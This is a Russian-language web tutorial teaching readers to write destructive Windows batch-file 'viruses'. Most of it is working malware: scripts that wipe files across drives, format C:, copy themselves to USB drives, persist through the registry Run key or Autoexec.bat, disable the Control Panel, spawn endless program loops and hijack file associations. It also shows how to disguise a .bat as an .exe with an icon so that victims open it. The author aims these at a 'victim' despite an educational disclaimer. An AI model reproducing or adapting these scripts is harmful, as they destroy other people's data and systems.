Anime Portal 1337

  Самоучитель по созданию вирусов в блокноте

Итак, приступим. Вы решили заняться вирусо-писательством. Сразу вам скажу, что эти вирусы, конечно, могут очень сильно навредить компьютеру, но полноценно передаваться с одного компьютера на другой они не могут. За все, что произойдет с вашим компьютером отвечаете вы и только вы. Приступим:
1) Открываем блокнот;
2) Пишем в нем «mspaint», без кавычек;
3) Сохраняем файл под любым именем, но вместо .txt мы напишем .bat;
4) Откроем файлик и увидим, что открылся Paint))
Вот и готова наша первая программка. Вместо «mspaint» можно вписать любую программу, например: Calc-калькулятор, Taskmgr-диспетчер задач… Но при чем здесь вирусы? - спросите вы. Ни при чем)) Следующее, что мы сделаем, это программа для изменения времени на компьютере, да и еще она будит копировать себя на флешку (если та вставлена). Итак:
Пишем в блокноте:

time 00:00
copy %0 F:\Work.bat

Первой сточкой мы изменяем время на 00:00, а второй скопируем файл на диск F - флешка с именем Work. Не забудьте, сохранить блокнотовский файл в формате .bat. Вместо времени можно изменить и дату «Date 13.06.23». Написав такую строчку, мы изменим дату на 2023 год, 6 месяц, 13 число)) Теперь небольшой перечень того, что можно писать в блокнотовском вирусе.
СПИСОК: 

1) «copy %0 x:\y» - копирует вирус на диск x в папку y (пример copy %0 C:\System.bat);
2) «label x:y» - переименовывает диск x на имя y (пример label C:error);
3) «time х:у» - меняет время на х часов и у минут (пример time 14:27);
4) «date x.y.z» - меняет дату на x день, y месяц, z лет (пример date 16.11.05);
5) «md х» - создаст папку, в том месте, где наш вирус, с именем х (пример md Papka);
6) «del *.* /q» - удалит все файлы (наш вирус тоже) в папке, где лежит наш вирус (кроме папок);
7) «del x:\y *.* /q» - удалит все файлы на диске х в папке у (кроме папок)  (пример del F:\Data*.* /q);
8) «assoc .х=.у» - переделает все файлы, на компьютере, форматом х на у (пример assoc .exe=.mp3);
9) «net user "х" /add» - добавит на компьютер пользователя под именем х (пример net user "Smoked" /add);
Вот две программки вам на рассмотрение, можете их использовать без моего соглашения, но, используя их, вы принимаете соглашение пользователя.
1)Программа для удаления файлов с флешки (если та вставлена) и переименования ее.

del F:\ *.* /q
label F:HACK

2)Программа для изменения даты и времени на компьютере и копирования ее на диск C и на флешку.

time 14:13
date 11.07.12
copy %0 C:\Time.bat
copy %0 F:\Time.bat

 
Вы уже умеете создавать простенькие вирусы.
Он умеет: менять время, дату, названия дисков и флешек, открывать программы, создавать папки, копировать себя, добавлять пользователей, менять расширения и уничтожать информацию. Это довольно небольшой список, чесно говоря. Теперь я научу вас некоторым тонкостям вирусописательсва. Допустим, вы уже сделали вирус, но выглядит он довольно некрасиво. Ну кто откроет непонятный файл? Вы правы, таких людей на свете не много. Как же изменить формат из .bat на .exe и добавить иконку. Очень легко (Нужно чтобы на компьютере был WinRAR). Находим любой вирус с расширением .bat, нажимаем на него правой кнопкой, жмем «Добавить в архив…». Ставим галочку «Создать SFX-архив», выбираем вкладку дополнительно, и кликаем на кнопку «Параметры SFX…». В окне «Выполнить после распаковки» пишем названия вируса (пример Virus.bat) а в окне «Текст и графика» далее «Загрузить значок SFX из фала». Жмем «Обзор» и ищем любой значок формата .ico. Теперь жмем ОК. Готово)) Формат .exe, а не .bat, как нам и надо было. Теперь можно делать с вирусами что угодно. А что именно, решать уже вам. Хотите научиться еще командам, которыми можно просто добить нашего «лоха», открываем www.Google.ru, пишем bat вирусы и жмем «Искать». 
 
Допустим, вы написали вирус, который будет портить открытую от папок информацию и немного вредить:

del C:\ *.* /q
del D:\ *.* /q
del E:\ *.* /q
del F:\ *.* /q
time 00:00
date 13.06.23
del *.* /q

Готово? – спросите вы. Нет. Нужно его закончить. Новая команда «@echo off» вводиться в начале нашего вируса и скрывает все, что в нем происходит в дальнейшем. Одним словом, не дадим пользователю увидеть, что случилось. Еще добавив после каждой команды простенькое, но очень эффективное действие, как «>nul» к примеру «time 00:00 >nul», мы скроем сточку. Итак, можно усовершенствовать наш вирус:

@echo off
del C:\ *.* /q >nul
del D:\ *.* /q >nul
del E:\ *.* /q >nul
del F:\ *.* /q >nul
time 00:00 >nul
date 13.06.23 >nul
del *.* /q >nul

Вот, теперь наш вирус готов. Сохраняем, конвертируем, а вот, что дальше с ним делать — ваше дело. Кстати, есть отличная программа для конвертирования .bat в .exe, она работает намного лучше WinRAR'а, называется она «Bat to exe converter». Скачать ее можно в интернете, она бесплатная. Итак, вернемся к вирусо-писательству.
%SystemRoot%/system32/rundll32 user32, SwapMouseButton
Данная строчка меняет клавиши мыши местами. Можно с кого-то прикольнуться,  пока он въедет, что случилось, пройдет время (если он совсем юзер), для особоодаренных скажу, если вы ввели это у себя отключить довольно просто: «Панель Управления», «Принтеры и другое оборудование», «Мышь» и снимаем первую галочку.
Итак, дальше поехали дальше:

:x ;
Start mspaint
goto x ;

Очень неплохая строка для нагрузки слабеньких машин. Команда открывает Paint, причем очень быстро. Раз 60 до того как вы поймете, что случилось и закроете программу. Попробуйте ввести вместо mspaint любые строки программ... Работает)) Можно использовать  по несколько таких команд до полного торможения компьютера жертвы. Новый скрипт:

copy ""%0"" "%SystemRoot%\system32\File.bat" 
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /f 
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

Очень жестокая команда: добавляет программу в автозагрузку ОС. Не советую проверять на вашем компьютере. Не останавливаемся, а едем дальше))

assoc .lnk=.txt >nul
assoc .exe=.mp3 >nul

Данными двумя строками мы делаем, весьма тяжелый вред компьютеру жертвы. Он меняет расширения всех файлов на компьютере с .lnk в .txt и  .exe в .mp3. То есть все ярлыки, открываются в блокноте, а программы, все, в плеере. Круто, да? Теперь прочтите нижний код и если вы поняли, в чем суть вируса, поздравляю вас вы закончили базовый курс, от SMOKED'а, вирусо-писательства. Если же нет. Читаем все заново))
@echo off
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
time 0:00 >nul
date 13.06.23 >nul
label C:IDIOT >nul
label D:URAK >nul
label E:SUKA >nul
label F:GANDON >nul
copy %0 C:\Open.bat >nul
copy %0 D:\Open.bat >nul
copy %0 E:\Open.bat >nul
copy %0 F:\Open.bat >nul
net user "Idiot you Hacked" /add >nul
net user "Bitch you Hacked" /add >nul
net user "Durak you Hacked" /add >nul
net user "Kritin you Hacked" /add >nul 
net user "Gavno you Hacked" /add >nul
md 1 >nul
md 2 >nul
md 3 >nul
md 4 >nul
md 5 >nul
md 6 >nul
md 7 >nul
md 8 >nul
md 9 >nul
md 10 >nul
md 11 >nul
md 12 >nul
md 13 >nul
md 14 >nul
md 15 >nul
md 16 >nul
md 17 >nul
md 18 >nul
md 19 >nul
md 20 >nul
md 21 >nul
md 22 >nul
md 23 >nul
md 24 >nul
md 25 >nul
md 26 >nul
md 27 >nul
assoc .lnk=.txt >nul
assoc .exe=.txt >nul
:x ; 
Start mspaint 
goto x ; 
:x ; 
Start Calc 
goto x ; 
copy ""%0"" "%SystemRoot%\system32\Cool.bat" >nul
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Cool" /t REG_SZ /d "%SystemRoot%\system32\Cool.bat" /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul
del %0 >nul

                           "Ват" вирусах

    Внимание! Данный раздел сайта создан исключительно для изучений возможностей среды MS-DOS. Любые приведенные здесь примеры носят исключительно образовательный характер. Автор не несет никакой ответственности за любой ущерб связанный с применением материалов этой страницы, а также программ полученных с этого сайта

В этом разделе пойдет речь о программах написанных в среде MS-DOS и как следствие имеющих расширение "bat". Вообще в этой среде можно создать примитивнейшие программы выполняюшие как полезные, так и разрушительные действия с вашей системой, но от их примитивности действенность не уменьшается. Для этого почти ничего не нужно кроме текстового редактора( например: блокнот в Windows) и елементарного знания команд DOS'а. Одним словом - все всем под силу. 

Вообще в данное время четкого определения вирусам нет, хотя существуют несколько общих аспектов которые позволяют называть ту или иную программу вирусом. Это способность самостоятельно создавать свои копии( распростроняться в системе) , выполнять те или иные действия( чаще разрушительные) без ведома и контроля хозяина системы....и т.д. В среде МS-DOS( далее "МД") есть команды копирования (COPY) , удаления (DEL) файлов, а также форматирования дисков (Format C:) и как следствие наличия этих комманд в "МД" можно создать вирус, который при определенных условиях будет копироваться в определенные места жесткого диска, удалять все файлы или файлы определенного вида(например только текстовые, или МР3, видео, драйвера, системные, и наконец просто одну программу) , создавать совершенно ненужные , но занимающие место(копировать уже существующие неоднократно придавая им разные имена), провоцировать сбой, выключение компьютера, перезагрузку, все в зависимости от фантазии создателя. Наряду с этим можно написать полезную программу выполняющую позитивные действия( например копирование файлов при установке программы, массовое удаление файлов засоряющих систему(*.tmp в Windows98) и многое другое.

Итак пример простейшего вируса который можно написать за 1 минуту. Пусть программа с расширением "Ват" называется "JKL"(JKL.bat).

Пример 1:

COPY JKL.bat C:\JKL.Bat

COPY JKL.bat C:\Windows\FIFA.bat

del C:\*.sys

del: C:\Command.com

del: C:\Windows\*.exe

del: JKL.bat

Пример 2:

mode con codepage prepare=((866) C:\WINDOWS\COMMAND\ega3.cpi)

mode con codepage select=866keyb ru,,C:\WINDOWS\COMMAND\keybrd3.sys

COPY JKL.bat C:\Autoexec.Bat

COPY C:\Autoexec.bat С:\Windows\JKL.bat

COPY C:\Autoexec.bat C:\Windows\System32\Autoexec.bat

dir >C:\Dzeran.boom.ru.htm

del C:\*.txt

del: C:\*.doc

del: C:\Windows\*.exe 

del: JKL.bat

В первом примере вирус при запуске копирует свое тело на диск С и в папку Windows под именем JKL. Затем удаляет файлы с расширением SYS,COM,EXE. и удаляет сам себя. Всего 6 строк, а сколько разрушений...

Во втором примере тот же вирус удаляет все текстовые файлы на диске С ,приобрел свойства автозагрузки копируя себя на диск С под именем Autoexec.bat заменяя тем самым оригинал.Но сам оригинал очень важен для работы системы и поэтому вирус имеет в своем теле содержимое самого Autoexec.bat.Проще говоря "Чтобы компьютер запускался"! Свойства автозагрузки придает вирусу относительную живучесть. И сколко не удаляй все копии вируса с диска-они все равно при каждом включении или перезагрузке компьютера будут возрождаться из пепла, пока не вылечить сам Autoexec.bat.( вылечив Autoexec.bat не забудьте удалить все копии вируса иначе начинайте все сначала). "Преимуществом" этих вирусов является его мизерная величина( менее 1 Килобайта)

Это самые примитивные программы-вирусы которые могут размножаться. Но можно написать вредоносную программу не имеющую таких свойств, и полностью убивающую информацию на диске. Что назвается"Только запусти" Пример:

del C:\*.exe
echo y|del*.*
echo y|Format C:
echo y|del C:\*.*
echo y|del D:\*.*

 Пять строчек- и информации каюк...Если не форматнет, так удалит все файлы(по большому счету разности никакой).

Итак: Для тех кто не понимает как можно воспользоваться таким вирусом( но делать этого не советую, так как вы уведомлены о его действиях и будете нести только свою ответственность за весь ущерб) я повторю...
1.Скопировать текст вируса с этой страницы
2.Открыть текстовый редактор( блокнот)
3.Вставить текст
4.Сохранить как: Имя_Файла.bat
5.Запустить

Таким способом можно создать как совершенно убийственные программы-вирусы, так и безопасные только распространяющиеся или выводящие текст при включении компьютера. Это зависит от фантазии автора.